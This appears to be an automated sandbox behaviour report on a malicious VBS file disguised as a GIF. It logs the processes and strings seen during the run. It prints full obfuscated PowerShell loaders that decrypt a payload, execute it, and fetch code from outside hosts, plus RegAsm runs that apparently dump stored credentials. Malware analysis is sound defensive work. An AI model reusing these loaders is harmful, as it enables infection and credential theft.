                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,9_2_00410DE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,7_2_00418758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,4_2_0040F474
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,4_2_0041B4A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_0041AA4A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].jsonJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\shietgtst-A57Q98
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwbrpynw.bnu.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7244
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7632
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: RegAsm.exe, RegAsm.exe, 00000008.00000002.2123311887.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: RegAsm.exe, 00000007.00000002.2134630961.0000000002E33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: createdthingstobefrankwithmeeverywhere.gIF.vbsVirustotal: Detection: 18%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jmlaun"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tgqsvxbzg"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jmlaun"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tgqsvxbzg"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s 